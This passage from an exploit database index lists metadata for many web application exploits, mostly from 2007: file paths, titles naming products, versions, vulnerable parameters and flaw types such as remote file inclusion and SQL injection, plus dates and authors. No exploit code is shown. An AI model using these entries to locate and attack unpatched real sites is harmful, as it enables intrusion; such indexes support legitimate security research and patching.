Injection",2007-02-19,ajann,webapps,php, +3336,exploits/php/webapps/3336.txt,"Ultimate Fun Book 1.02 - 'function.php' Remote File Inclusion",2007-02-20,kezzap66345,webapps,php, +3337,exploits/php/webapps/3337.php,"NukeSentinel 2.5.05 - 'nsbypass.php' Blind SQL Injection",2007-02-20,DarkFig,webapps,php, +3338,exploits/php/webapps/3338.php,"NukeSentinel 2.5.05 - 'nukesentinel.php' File Disclosure",2007-02-20,DarkFig,webapps,php, +3339,exploits/asp/webapps/3339.txt,"Online Web Building 2.0 - 'id' SQL Injection",2007-02-20,"Mehmet Ince",webapps,asp, +3344,exploits/php/webapps/3344.pl,"PHP-Nuke 8.0 Final - 'INSERT' Blind SQL Injection (MySQL)",2007-02-20,krasza,webapps,php, +3345,exploits/php/webapps/3345.pl,"PHP-Nuke 8.0 Final - 'INSERT' SQL Injection",2007-02-20,krasza,webapps,php, +3346,exploits/php/webapps/3346.pl,"PHP-Nuke 8.0 Final - HTTP Referers SQL Injection",2007-02-20,krasza,webapps,php, +3348,exploits/php/webapps/3348.txt,"SendStudio 2004.14 - 'ROOTDIR' Remote File Inclusion",2007-02-20,K-159,webapps,php, +3351,exploits/php/webapps/3351.pl,"webSPELL 4.01.02 - 'topic' SQL Injection",2007-02-21,DNX,webapps,php, +3352,exploits/php/webapps/3352.php,"Connectix Boards 0.7 - 'p_skin' Multiple Vulnerabilities",2007-02-21,DarkFig,webapps,php, +3353,exploits/php/webapps/3353.txt,"DBImageGallery 1.2.2 - 'donsimg_base_path' Remote File Inclusion",2007-02-21,Denven,webapps,php, +3354,exploits/php/webapps/3354.txt,"DBGuestbook 1.1 - 'dbs_base_path' Remote File Inclusion",2007-02-21,Denven,webapps,php, +3355,exploits/php/webapps/3355.php,"Nabopoll 1.2 - 'result.php?surv' Blind SQL Injection",2007-02-21,s0cratex,webapps,php, +3357,exploits/php/webapps/3357.txt,"DZCP (deV!L_z Clanportal) 1.4.5 - Remote File Disclosure",2007-02-21,Kiba,webapps,php, +3360,exploits/php/webapps/3360.txt,"FlashGameScript 1.5.4 - 'index.php?func' Remote File Inclusion",2007-02-22,JuMp-Er,webapps,php, +3361,exploits/php/webapps/3361.txt,"eFiction 3.1.1 - 'path_to_smf' Remote File Inclusion",2007-02-22,"ThE dE@Th",webapps,php, +3365,exploits/php/webapps/3365.txt,"FCRing 1.31 - 'fcring.php?s_fuss' Remote File Inclusion",2007-02-23,kezzap66345,webapps,php, +3366,exploits/php/webapps/3366.txt,"Sinapis 2.2 Gastebuch - 'sinagb.php?fuss' Remote File Inclusion",2007-02-23,kezzap66345,webapps,php, +3367,exploits/php/webapps/3367.txt,"Sinapis Forum 2.2 - 'sinapis.php?fuss' Remote File Inclusion",2007-02-23,kezzap66345,webapps,php, +3370,exploits/php/webapps/3370.pl,"Extreme phpBB 3.0.1 - 'functions.php' Remote File Inclusion",2007-02-24,"Mehmet Ince",webapps,php, +3371,exploits/php/webapps/3371.php,"Coppermine Photo Gallery 1.3.x - Blind SQL Injection",2007-02-24,s0cratex,webapps,php, +3372,exploits/php/webapps/3372.php,"CS-Gallery 2.0 - 'index.php?album' Remote File Inclusion",2007-02-24,burncycle,webapps,php, +3373,exploits/php/webapps/3373.pl,"phpBB Module NoMoKeTos Rules 0.0.1 - Remote File Inclusion",2007-02-24,bd0rk,webapps,php, +3374,exploits/php/webapps/3374.txt,"PHP-MIP 0.1 - 'top.php?laypath' Remote File Inclusion",2007-02-25,GoLd_M,webapps,php, +3379,exploits/php/webapps/3379.php,"STWC-Counter 3.4.0 - 'downloadcounter.php' Remote File Inclusion",2007-02-26,burncycle,webapps,php, +3382,exploits/php/webapps/3382.txt,"Admin Phorum 3.3.1a - 'del.php?include_path' Remote File Inclusion",2007-02-27,GoLd_M,webapps,php, +3387,exploits/php/webapps/3387.php,"vBulletin 3.6.4 - 'inlinemod.php?postids' SQL Injection",2007-02-28,rgod,webapps,php, +3390,exploits/asp/webapps/3390.txt,"Angel Lms 7.1 - 'default.asp?id' SQL Injection",2007-03-01,"Craig Heffner",webapps,asp, +3393,exploits/php/webapps/3393.php,"phpMyFAQ 1.6.7 - SQL Injection / Command Execution",2007-03-01,elgCrew,webapps,php, +39567,exploits/php/webapps/39567.txt,"Monstra CMS 3.0.3 - Multiple Vulnerabilities",2016-03-16,"Sarim Kiani",webapps,php,80 +3398,exploits/php/webapps/3398.txt,"Mani Stats Reader 1.2 - 'ipath' Remote File Inclusion",2007-03-02,mozi,webapps,php, +3400,exploits/php/webapps/3400.pl,"webSPELL 4.01.02 - Multiple SQL Injections",2007-03-02,DNX,webapps,php, +3402,exploits/php/webapps/3402.php,"webSPELL 4.01.02 - PHP Remote Code Execution",2007-03-03,DarkFig,webapps,php, +3403,exploits/php/webapps/3403.php,"Rigter Portal System (RPS) 6.2 - Blind SQL Injection",2007-03-04,s0cratex,webapps,php, +3406,exploits/php/webapps/3406.pl,"News-Letterman 1.1 - 'eintrag.php?sqllog' Remote File Inclusion",2007-03-04,bd0rk,webapps,php, +3408,exploits/php/webapps/3408.pl,"AJ Auction Pro - 'subcat.php' SQL Injection",2007-03-04,ajann,webapps,php, +3409,exploits/php/webapps/3409.html,"AJ Dating 1.0 - 'view_profile.php' SQL Injection",2007-03-04,ajann,webapps,php, +3410,exploits/php/webapps/3410.html,"AJ Classifieds 1.0 - 'postingdetails.php' SQL Injection",2007-03-04,ajann,webapps,php, +3411,exploits/php/webapps/3411.pl,"AJ Forum 1.0 - 'topic_title.php' SQL Injection",2007-03-04,ajann,webapps,php, +3412,exploits/cgi/webapps/3412.txt,"RRDBrowse 1.6 - Arbitrary File Disclosure",2007-03-04,"Sebastian Wolfgarten",webapps,cgi, +3416,exploits/php/webapps/3416.pl,"Links Management Application 1.0 - 'lcnt' SQL Injection",2007-03-05,ajann,webapps,php, +3423,exploits/php/webapps/3423.txt,"PHP-Nuke Module PostGuestbook 0.6.1 - 'tpl_pgb_moddir' Remote File Inclusion",2007-03-07,GoLd_M,webapps,php, +3428,exploits/php/webapps/3428.txt,"Flat Chat 2.0 - 'include online.txt' Remote Code Execution",2007-03-07,Dj7xpl,webapps,php, +3435,exploits/php/webapps/3435.txt,"netForo! 0.1 - 'down.php?file_to_download' Remote File Disclosure",2007-03-08,GoLd_M,webapps,php, +3436,exploits/php/webapps/3436.txt,"WEBO (Web ORGanizer) 1.0 - 'baseDir' Remote File Inclusion",2007-03-08,K-159,webapps,php, +3437,exploits/asp/webapps/3437.txt,"GaziYapBoz Game Portal - 'kategori.asp' SQL Injection",2007-03-08,CyberGhost,webapps,asp, +3438,exploits/php/webapps/3438.txt,"Magic CMS 4.2.747 - 'mysave.php' Remote File Inclusion",2007-03-08,DNX,webapps,php, +3443,exploits/php/webapps/3443.txt,"PMB Services 3.0.13 - Multiple Remote File Inclusions",2007-03-09,K-159,webapps,php, +3447,exploits/php/webapps/3447.txt,"Grayscale Blog 0.8.0 - Security Bypass / SQL Injection / Cross-Site Scripting",2007-03-09,Omni,webapps,php, +3448,exploits/php/webapps/3448.txt,"work system E-Commerce 3.0.5 - Remote File Inclusion",2007-03-10,"Rodrigo Duarte",webapps,php, +3449,exploits/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 - 'index.php?ID' SQL Injection",2007-03-10,WiLdBoY,webapps,php, +3450,exploits/php/webapps/3450.php,"NukeSentinel 2.5.06 - SQL Injection",2007-03-10,DarkFig,webapps,php, +3454,exploits/php/webapps/3454.pl,"PostNuke Module phgstats 0.5 - 'phgdir' Remote File Inclusion",2007-03-11,bd0rk,webapps,php, +3455,exploits/php/webapps/3455.html,"JobSitePro 1.0 - 'search.php' SQL Injection",2007-03-11,ajann,webapps,php, +3456,exploits/php/webapps/3456.pl,"Top Auction 1.0 - 'viewcat.php' SQL Injection",2007-03-11,ajann,webapps,php, +3457,exploits/php/webapps/3457.pl,"SonicMailer Pro 3.2.3 - 'index.php' SQL Injection",2007-03-11,ajann,webapps,php, +3458,exploits/php/webapps/3458.txt,"AssetMan 2.4a - 'download_pdf.php' Remote File Disclosure",2007-03-11,"BorN To K!LL",webapps,php, +3459,exploits/php/webapps/3459.txt,"cPanel 10.9.x - 'Fantastico' Local File Inclusion",2007-03-11,"cyb3rt & 020",webapps,php, +3465,exploits/php/webapps/3465.txt,"OES (Open Educational System) 0.1beta - Remote File Inclusion",2007-03-12,K-159,webapps,php, +3466,exploits/asp/webapps/3466.txt,"BP Blog 7.0 - 'layout' SQL Injection",2007-03-12,BeyazKurt,webapps,asp, +3467,exploits/php/webapps/3467.txt,"GestArt Beta 1 - 'aide.php?aide' Remote File Inclusion",2007-03-13,Dj7xpl,webapps,php, +3468,exploits/php/webapps/3468.txt,"MySQL Commander 2.7 - 'home' Remote File Inclusion",2007-03-13,K-159,webapps,php, +3469,exploits/asp/webapps/3469.txt,"X-ice News System 1.0 - 'devami.asp?id' SQL Injection",2007-03-13,CyberGhost,webapps,asp, +3470,exploits/asp/webapps/3470.html,"JGBBS 3.0beta1 - 'search.asp?author' SQL Injection",2007-03-13,WiLdBoY,webapps,asp, +3471,exploits/php/webapps/3471.txt,"Activist Mobilization Platform (AMP) 3.2 - Remote File Inclusion",2007-03-13,the_day,webapps,php, +3472,exploits/php/webapps/3472.txt,"CARE2X 1.1 - 'ROOT_PATH' Remote File Inclusion",2007-03-13,the_day,webapps,php, +3473,exploits/php/webapps/3473.txt,"WebCreator 0.2.6-rc3 - 'moddir' Remote File Inclusion",2007-03-13,the_day,webapps,php, +3476,exploits/php/webapps/3476.pl,"Zomplog 3.7.6 (Windows x86) - Local File Inclusion",2007-03-14,Bl0od3r,webapps,php, +3477,exploits/php/webapps/3477.html,"WSN Guest 1.21 - 'id' SQL Injection",2007-03-14,WiLdBoY,webapps,php, +3478,exploits/php/webapps/3478.html,"Dayfox Blog 4 - 'postpost.php' Remote Code Execution",2007-03-14,Dj7xpl,webapps,php, +3481,exploits/asp/webapps/3481.html,"Orion-Blog 2.0 - Remote Authentication Bypass",2007-03-15,WiLdBoY,webapps,asp, +3483,exploits/php/webapps/3483.pl,"Woltlab Burning Board 2.x - 'usergroups.php' SQL Injection",2007-03-15,x666,webapps,php, +3484,exploits/php/webapps/3484.txt,"WebLog - 'index.php' Remote File Disclosure",2007-03-15,Dj7xpl,webapps,php, +3485,exploits/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 - 'INCLUDE_PATH' Remote File Inclusion",2007-03-15,the_day,webapps,php, +3486,exploits/php/webapps/3486.txt,"Groupit 2.00b5 - 'c_basepath' Remote File Inclusion",2007-03-15,the_day,webapps,php, +3487,exploits/php/webapps/3487.pl,"CcMail 1.0.1 - 'functions_dir' Remote File Inclusion",2007-03-15,Crackers_Child,webapps,php, +3489,exploits/php/webapps/3489.txt,"creative Guestbook 1.0 - Multiple Vulnerabilities",2007-03-15,Dj7xpl,webapps,php, +3490,exploits/php/webapps/3490.txt,"wbblog - Cross-Site Scripting / SQL Injection",2007-03-15,"Mehmet Ince",webapps,php, +3492,exploits/php/webapps/3492.txt,"WebCalendar 0.9.45 - 'includedir' Remote File Inclusion",2007-03-15,Drackanz,webapps,php, +3493,exploits/asp/webapps/3493.txt,"Absolute Image Gallery 2.0 - 'gallery.asp?categoryId' SQL Injection",2007-03-15,WiLdBoY,webapps,asp, +3494,exploits/php/webapps/3494.txt,"McGallery 0.5b - 'download.php' Arbitrary File Download",2007-03-15,Piker,webapps,php, +3496,exploits/php/webapps/3496.php,"PHP-Stats 0.1.9.1b - 'PC-REMOTE-ADDR' SQL Injection",2007-03-16,rgod,webapps,php, +3497,exploits/php/webapps/3497.php,"PHP-Stats 0.1.9.1b - 'ip' SQL Injection",2007-03-16,rgod,webapps,php, +3498,exploits/php/webapps/3498.txt,"Creative Files 1.2 - 'kommentare.php' SQL Injection",2007-03-16,"Mehmet Ince",webapps,php, +3500,exploits/php/webapps/3500.html,"Particle Blogger 1.2.0 - 'post.php?postid' SQL Injection",2007-03-16,WiLdBoY,webapps,php, +3501,exploits/php/webapps/3501.txt,"PHP DB Designer 1.02 - Remote File Inclusion",2007-03-16,GoLd_M,webapps,php, +3502,exploits/php/webapps/3502.php,"PHP-Stats 0.1.9.1b - 'PHP-stats-options.php' Command Execution",2007-03-17,rgod,webapps,php, +3503,exploits/php/webapps/3503.txt,"MPM Chat 2.5 - 'view.php?logi' Local File Inclusion",2007-03-17,GoLd_M,webapps,php, +3504,exploits/php/webapps/3504.pl,"Active PHP Bookmark Notes 0.2.5 - Remote File Inclusion",2007-03-17,GoLd_M,webapps,php, +3505,exploits/php/webapps/3505.php,"Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (1)",2007-03-18,DarkFig,webapps,php, +3506,exploits/php/webapps/3506.html,"Guestbara 1.2 - Change Admin Login and Password",2007-03-18,Kacper,webapps,php, +3507,exploits/php/webapps/3507.pl,"ScriptMagix FAQ Builder 2.0 - 'index.php' SQL Injection",2007-03-18,ajann,webapps,php, +3508,exploits/php/webapps/3508.txt,"Moodle 1.5.2 - 'moodledata' Remote Session Disclosure",2007-03-18,xSh,webapps,php, +3509,exploits/php/webapps/3509.pl,"ScriptMagix Jokes 2.0 - 'index.php?catid' SQL Injection",2007-03-18,ajann,webapps,php, +3510,exploits/php/webapps/3510.pl,"ScriptMagix Recipes 2.0 - 'index.php?catid' SQL Injection",2007-03-18,ajann,webapps,php, +3511,exploits/php/webapps/3511.pl,"ScriptMagix Photo Rating 2.0 - SQL Injection",2007-03-18,ajann,webapps,php, +3512,exploits/php/webapps/3512.txt,"PHP-Nuke - 'iframe.php' Remote File Inclusion",2007-03-18,"Cold Zero",webapps,php, +3513,exploits/php/webapps/3513.php,"Katalog Plyt Audio (pl) 1.0 - SQL Injection",2007-03-18,Kacper,webapps,php, +3515,exploits/php/webapps/3515.pl,"ScriptMagix Lyrics 2.0 - 'index.php?recid' SQL Injection",2007-03-19,ajann,webapps,php, +3516,exploits/php/webapps/3516.php,"MetaForum 0.513 Beta - Arbitrary File Upload",2007-03-19,Gu1ll4um3r0m41n,webapps,php, +3518,exploits/php/webapps/3518.pl,"PHP-Nuke Module splattforum 4.0 RC1 - Local File Inclusion",2007-03-19,GoLd_M,webapps,php, +3519,exploits/php/webapps/3519.txt,"phpBB Minerva Mod 2.0.21 build 238a - SQL Injection",2007-03-19,"Mehmet Ince",webapps,php, +3520,exploits/asp/webapps/3520.txt,"NetVIOS Portal - 'page.asp' SQL Injection",2007-03-19,parad0x,webapps,asp, +3521,exploits/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 (Windows) - Local File Inclusion",2007-03-19,bd0rk,webapps,php, +3522,exploits/php/webapps/3522.pl,"GeBlog 0.1 (Windows) - GLOBALS[tplname] Local File Inclusion",2007-03-20,GoLd_M,webapps,php, +3524,exploits/php/webapps/3524.txt,"PHP-Nuke Module htmltonuke 2.0alpha - 'htmltonuke.php' Remote File Inclusion",2007-03-20,"Cold Zero",webapps,php, +3528,exploits/php/webapps/3528.pl,"PHPRaid < 3.0.7 - 'rss.php?PHPraid_dir' Remote File Inclusion",2007-03-20,"Cold Zero",webapps,php, +3530,exploits/php/webapps/3530.pl,"Monster Top List 1.4.2 - 'functions.php?root_path' Remote File Inclusion",2007-03-20,fluffy_bunny,webapps,php, +3532,exploits/php/webapps/3532.txt,"study planner (studiewijzer) 0.15 - Remote File Inclusion",2007-03-21,K-159,webapps,php, +3533,exploits/php/webapps/3533.txt,"Digital Eye CMS 0.1.1b - 'module.php' Remote File Inclusion",2007-03-21,"Cold Zero",webapps,php, +3534,exploits/asp/webapps/3534.txt,"Active Link Engine - 'default.asp?catid' SQL Injection",2007-03-21,CyberGhost,webapps,asp, +3536,exploits/asp/webapps/3536.txt,"Active Photo Gallery - 'catid' SQL Injection",2007-03-21,CyberGhost,webapps,asp, +3538,exploits/php/webapps/3538.txt,"PHP-revista 1.1.2 - Multiple SQL Injections",2007-03-21,"Cold Zero",webapps,php, +3539,exploits/php/webapps/3539.txt,"Mambo Component nfnaddressbook 0.4 - Remote File Inclusion",2007-03-21,"Cold Zero",webapps,php, +3542,exploits/php/webapps/3542.txt,"ClassWeb 2.0.3 - 'BASE' Remote File Inclusion",2007-03-22,GoLd_M,webapps,php, +3543,exploits/php/webapps/3543.pl,"PortailPhp 2.0 - 'idnews' SQL Injection",2007-03-22,"Mehmet Ince",webapps,php, +3545,exploits/php/webapps/3545.txt,"Lms 1.8.9 - Vala Remote File Inclusion",2007-03-22,Kacper,webapps,php, +3546,exploits/asp/webapps/3546.txt,"AspWebCalendar 4.5 - 'eventid' SQL Injection",2007-03-22,parad0x,webapps,asp, +3548,exploits/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 - 'op' Local File Inclusion",2007-03-23,GoLd_M,webapps,php, +3549,exploits/asp/webapps/3549.txt,"Active Trade 2 - 'catid' SQL Injection",2007-03-23,CyberGhost,webapps,asp, +3550,exploits/asp/webapps/3550.txt,"ActiveBuyandSell 6.2 - 'buyersend.asp?catid' SQL Injection",2007-03-23,CyberGhost,webapps,asp, +3551,exploits/asp/webapps/3551.txt,"Active Auction Pro 7.1 - 'default.asp?catid' SQL Injection",2007-03-23,CyberGhost,webapps,asp, +3552,exploits/php/webapps/3552.txt,"Philex 0.2.3 - Remote File Inclusion / File Disclosure",2007-03-23,GoLd_M,webapps,php, +3556,exploits/asp/webapps/3556.html,"Active NewsLetter 4.3 - 'ViewNewspapers.asp' SQL Injection",2007-03-23,ajann,webapps,asp, +3557,exploits/php/webapps/3557.txt,"Joomla! / Mambo Component SWmenu 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",webapps,php, +3558,exploits/asp/webapps/3558.html,"eWebquiz 8 - 'eWebQuiz.asp' SQL Injection",2007-03-23,ajann,webapps,asp, +3560,exploits/php/webapps/3560.txt,"Joomla! Component Joomlaboard 1.1.1 - 'sbp' Remote File Inclusion",2007-03-23,"Cold Zero",webapps,php, +3562,exploits/php/webapps/3562.txt,"Net-Side.net CMS - 'index.php?cms' Remote File Inclusion",2007-03-24,Sharingan,webapps,php, +3563,exploits/php/webapps/3563.txt,"ttCMS 4 - 'ez_sql.php?lib_path' Remote File Inclusion",2007-03-24,Kacper,webapps,php, +3564,exploits/php/webapps/3564.pl,"Joomla! Component Car Manager 1.1 - SQL Injection",2007-03-24,ajann,webapps,php, +3565,exploits/php/webapps/3565.pl,"Joomla! Component RWCards 2.4.3 - SQL Injection",2007-03-24,ajann,webapps,php, +3567,exploits/php/webapps/3567.pl,"Mambo Module Flatmenu 1.07 - Remote File Inclusion",2007-03-25,"Cold Zero",webapps,php, +3568,exploits/php/webapps/3568.txt,"Free Image Hosting 2.0 - 'AD_BODY_TEMP' Remote File Inclusion",2007-03-25,Crackers_Child,webapps,php, +3569,exploits/php/webapps/3569.pl,"PBlang 4.66z - Remote Create Admin",2007-03-25,Hessam-x,webapps,php, +3574,exploits/php/webapps/3574.pl,"PBlang 4.66z - Remote Code Execution",2007-03-25,Hessam-x,webapps,php, +3580,exploits/php/webapps/3580.pl,"IceBB 1.0-rc5 - Remote Create Admin",2007-03-26,Hessam-x,webapps,php, +3581,exploits/php/webapps/3581.pl,"IceBB 1.0-rc5 - Remote Code Execution",2007-03-26,Hessam-x,webapps,php, +3582,exploits/php/webapps/3582.pl,"PHP-Nuke Module AddressBook 1.2 - Local File Inclusion",2007-03-26,bd0rk,webapps,php, +3583,exploits/php/webapps/3583.txt,"C-Arbre 0.6PR7 - 'ROOT_PATH' Remote File Inclusion",2007-03-26,K-159,webapps,php, +3588,exploits/php/webapps/3588.pl,"XOOPS module Articles 1.02 - 'print.php?id' SQL Injection",2007-03-27,WiLdBoY,webapps,php, +3590,exploits/php/webapps/3590.html,"Joomla! Component D4JeZine 2.8 - Blind SQL Injection",2007-03-27,ajann,webapps,php, +3591,exploits/php/webapps/3591.txt,"PHP-Nuke Module Eve-Nuke 0.1 - 'mysql.php' Remote File Inclusion",2007-03-27,"ThE TiGeR",webapps,php, +3592,exploits/php/webapps/3592.html,"Web Content System 2.7.1 - Remote File Inclusion",2007-03-27,kezzap66345,webapps,php, +3594,exploits/php/webapps/3594.pl,"XOOPS module Articles 1.03 - 'index.php?cat_id' SQL Injection",2007-03-28,ajann,webapps,php, +3596,exploits/php/webapps/3596.txt,"iPhotoAlbum 1.1 - 'header.php' Remote File Inclusion",2007-03-28,GoLd_M,webapps,php, +3597,exploits/php/webapps/3597.pl,"XOOPS Module Friendfinder 3.3 - 'view.php?id' SQL Injection",2007-03-28,ajann,webapps,php, +3598,exploits/php/webapps/3598.txt,"MangoBery CMS 0.5.5 - 'quotes.php' Remote File Inclusion",2007-03-28,kezzap66345,webapps,php, +3599,exploits/php/webapps/3599.txt,"CodeBB 1.0 Beta 2 - 'phpbb_root_path' Remote File Inclusion",2007-03-28,"Alkomandoz Hacker",webapps,php, +3600,exploits/php/webapps/3600.txt,"Softerra Time-Assistant 6.2 - 'inc_dir' Remote File Inclusion",2007-03-29,K-159,webapps,php, +3601,exploits/php/webapps/3601.pl,"sBLOG 0.7.3 Beta - '/inc/lang.php' Local File Inclusion",2007-03-29,GoLd_M,webapps,php, +3603,exploits/php/webapps/3603.pl,"XOOPS Module MyAds Bug Fix 2.04jp - 'index.php' SQL Injection",2007-03-29,ajann,webapps,php, +3605,exploits/php/webapps/3605.php,"Picture-Engine 1.2.0 - 'wall.php?cat' SQL Injection",2007-03-29,Kacper,webapps,php, +3607,exploits/php/webapps/3607.txt,"Kaqoo Auction - 'install_root' Multiple Remote File Inclusions",2007-03-29,"ThE dE@Th",webapps,php, +3608,exploits/php/webapps/3608.txt,"Advanced Login 0.7 - 'root' Remote File Inclusion",2007-03-29,Bithedz,webapps,php, +3611,exploits/php/webapps/3611.txt,"JC URLShrink 1.3.1 - Remote Code Execution",2007-03-30,Dj7xpl,webapps,php, +3612,exploits/php/webapps/3612.pl,"XOOPS Module Repository - 'viewcat.php' SQL Injection",2007-03-30,ajann,webapps,php, +3613,exploits/php/webapps/3613.txt,"phpBB MOD Forum picture and META tags 1.7 - Remote File Inclusion",2007-03-30,bd0rk,webapps,php, +3614,exploits/php/webapps/3614.txt,"JSBoard 2.0.10 - 'login.php?table' Local File Inclusion",2007-03-30,GoLd_M,webapps,php, +3618,exploits/php/webapps/3618.html,"XOOPS Module Lykos Reviews 1.00 - 'index.php' SQL Injection",2007-03-31,ajann,webapps,php, +3619,exploits/php/webapps/3619.pl,"XOOPS Module Library - 'viewcat.php' SQL Injection",2007-03-31,ajann,webapps,php, +3620,exploits/php/webapps/3620.pl,"XOOPS Module Core - 'viewcat.php' SQL Injection",2007-03-31,ajann,webapps,php, +3621,exploits/php/webapps/3621.pl,"XOOPS Module Tutoriais - 'viewcat.php' SQL Injection",2007-03-31,ajann,webapps,php, +3622,exploits/php/webapps/3622.php,"WinMail Server 4.4 build 1124 - 'WebMail' Remote Add Super User",2007-04-01,rgod,webapps,php, +3623,exploits/php/webapps/3623.pl,"XOOPS Module eCal 2.24 - 'display.php' SQL Injection",2007-04-01,ajann,webapps,php, +3624,exploits/php/webapps/3624.txt,"BT-sondage 1.12 - 'gestion_sondage.php' Remote File Inclusion",2007-04-01,Crackers_Child,webapps,php, +3625,exploits/php/webapps/3625.pl,"XOOPS Module Tiny Event 1.01 - 'id' SQL Injection",2007-04-01,ajann,webapps,php, +3626,exploits/php/webapps/3626.pl,"XOOPS Module Kshop 1.17 - 'id' SQL Injection",2007-04-01,ajann,webapps,php, +3628,exploits/php/webapps/3628.txt,"CWB PRO 1.5 - 'INCLUDE_PATH' Remote File Inclusion",2007-04-01,GoLd_M,webapps,php, +3629,exploits/php/webapps/3629.pl,"XOOPS Module Camportail 1.1 - 'camid' SQL Injection",2007-04-01,ajann,webapps,php, +3630,exploits/php/webapps/3630.html,"XOOPS Module debaser 0.92 - 'genre.php' Blind SQL Injection",2007-04-01,ajann,webapps,php, +3631,exploits/php/webapps/3631.txt,"FlexPHPNews 0.0.5 - 'newsid' SQL Injection",2007-04-01,Dj7xpl,webapps,php, +3632,exploits/php/webapps/3632.pl,"XOOPS Module myAlbum-P 2.0 - 'cid' SQL Injection",2007-04-01,ajann,webapps,php, +3633,exploits/php/webapps/3633.html,"XOOPS Module RM+Soft Gallery 1.0 - Blind SQL Injection",2007-04-01,ajann,webapps,php, +3638,exploits/php/webapps/3638.txt,"MapLab MS4W 2.2.1 - Remote File Inclusion",2007-04-02,ka0x,webapps,php, +3639,exploits/php/webapps/3639.txt,"PHP-Fusion Module topliste 1.0 - 'cid' SQL Injection",2007-04-02,"Mehmet Ince",webapps,php, +3640,exploits/php/webapps/3640.txt,"PHP-Fusion Module Arcade 1.0 - 'cid' SQL Injection",2007-04-02,"Mehmet Ince",webapps,php, +3641,exploits/php/webapps/3641.txt,"Really Simple PHP and Ajax (RSPA) 2007-03-23 - Remote File Inclusion",2007-04-02,"Hamid Ebadi",webapps,php, +3644,exploits/php/webapps/3644.pl,"XOOPS Module WF-Section 1.01 - 'articleId' SQL Injection",2007-04-02,ajann,webapps,php, +3645,exploits/php/webapps/3645.html,"XOOPS Module XFsection 1.07 - 'articleId' Blind SQL Injection",2007-04-02,ajann,webapps,php, +3646,exploits/php/webapps/3646.pl,"XOOPS Module Zmagazine 1.0 - 'print.php' SQL Injection",2007-04-02,ajann,webapps,php, +3653,exploits/php/webapps/3653.php,"MyBulletinBoard (MyBB) 1.2.3 - Remote Code Execution",2007-04-03,DarkFig,webapps,php, +3655,exploits/php/webapps/3655.html,"XOOPS Module PopnupBlog 2.52 - 'postid' Blind SQL Injection",2007-04-03,ajann,webapps,php, +3656,exploits/php/webapps/3656.pl,"WordPress 2.1.2 - 'xmlrpc' SQL Injection",2007-04-03,"Sumit Siddharth",webapps,php, +3657,exploits/php/webapps/3657.txt,"MySpeach 3.0.7 - Local/Remote File Inclusion",2007-04-03,Xst3nZ,webapps,php, +3658,exploits/php/webapps/3658.html,"phpMyNewsletter 0.6.10 - 'customize.php' Remote File Inclusion",2007-04-04,frog-m@n,webapps,php, +3659,exploits/php/webapps/3659.txt,"AROUNDMe 0.7.7 - Multiple Remote File Inclusions",2007-04-04,kezzap66345,webapps,php, +3660,exploits/php/webapps/3660.pl,"CyBoards PHP Lite 1.21 - 'script_path' Remote File Inclusion",2007-04-04,bd0rk,webapps,php, +3663,exploits/php/webapps/3663.html,"XOOPS Module WF-Snippets 1.02 (c) - Blind SQL Injection",2007-04-04,ajann,webapps,php, +3665,exploits/php/webapps/3665.html,"Mutant 0.9.2 - 'mutant_functions.php' Remote File Inclusion",2007-04-04,bd0rk,webapps,php, +3666,exploits/php/webapps/3666.pl,"XOOPS Module Rha7 Downloads 1.0 - 'visit.php' SQL Injection",2007-04-04,ajann,webapps,php, +3667,exploits/php/webapps/3667.txt,"Sisplet CMS 05.10 - 'site_path' Remote File Inclusion",2007-04-05,kezzap66345,webapps,php, +3668,exploits/php/webapps/3668.txt,"CodeWand phpBrowse - 'site_path' Remote File Inclusion",2007-04-05,kezzap66345,webapps,php, +3669,exploits/php/webapps/3669.txt,"PHP-Generics 1.0.0 Beta - Multiple Remote File Inclusions",2007-04-05,bd0rk,webapps,php, +3670,exploits/php/webapps/3670.txt,"XOOPS Module WF-Links 1.03 - 'cid' SQL Injection",2007-04-05,ajann,webapps,php, +3671,exploits/php/webapps/3671.php,"phpMyNewsletter 0.8 (beta5) - Multiple Vulnerabilities",2007-04-05,BlackHawk,webapps,php, +3672,exploits/php/webapps/3672.pl,"XOOPS Module Jobs 2.4 - 'cid' SQL Injection",2007-04-05,ajann,webapps,php, +3673,exploits/php/webapps/3673.txt,"WebSPELL 4.01.02 - 'picture.php' File Disclosure",2007-04-05,Trex,webapps,php, +3676,exploits/php/webapps/3676.txt,"Beryo 2.0 - 'downloadpic.php?chemin' Remote File Disclosure",2007-04-06,GoLd_M,webapps,php, +3677,exploits/php/webapps/3677.txt,"cattaDoc 2.21 - 'download2.php?fn1' Remote File Disclosure",2007-04-06,GoLd_M,webapps,php, +3678,exploits/php/webapps/3678.php,"SmodBIP 1.06 - aktualnosci zoom SQL Injection",2007-04-06,Kacper,webapps,php, +3679,exploits/php/webapps/3679.php,"SmodCMS 2.10 - Slownik ssid SQL Injection",2007-04-06,Kacper,webapps,php, +3681,exploits/php/webapps/3681.txt,"Scorp Book 1.0 - 'smilies.php?config' Remote File Inclusion",2007-04-08,Dj7xpl,webapps,php, +3683,exploits/php/webapps/3683.pl,"PHP-Nuke Module eBoard 1.0.7 - GLOBALS[name] Local File Inclusion",2007-04-08,bd0rk,webapps,php, +3685,exploits/php/webapps/3685.txt,"MyBlog: PHP and MySQL Blog/CMS software - Remote File Inclusion",2007-04-08,the_Edit0r,webapps,php, +3686,exploits/php/webapps/3686.txt,"WitShare 0.9 - 'index.php?menu' Local File Inclusion",2007-04-08,the_Edit0r,webapps,php, +3687,exploits/php/webapps/3687.txt,"ScarNews 1.2.1 - 'sn_admin_dir' Local File Inclusion",2007-04-08,BeyazKurt,webapps,php, +3689,exploits/php/webapps/3689.txt,"PcP-Guestbook 3.0 - 'lang' Local File Inclusion",2007-04-08,Dj7xpl,webapps,php, +3691,exploits/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 - SQL Injection",2007-04-09,"h a c k e r _ X",webapps,php, +3694,exploits/php/webapps/3694.txt,"PHP121 Instant Messenger 2.2 - Local File Inclusion",2007-04-09,Dj7xpl,webapps,php, +3696,exploits/php/webapps/3696.txt,"Pathos CMS 0.92-2 - 'warn.php' Remote File Inclusion",2007-04-09,kezzap66345,webapps,php, +3697,exploits/php/webapps/3697.txt,"HIOX GUEST BOOK (HGB) 4.0 - Remote Code Execution",2007-04-10,Dj7xpl,webapps,php, 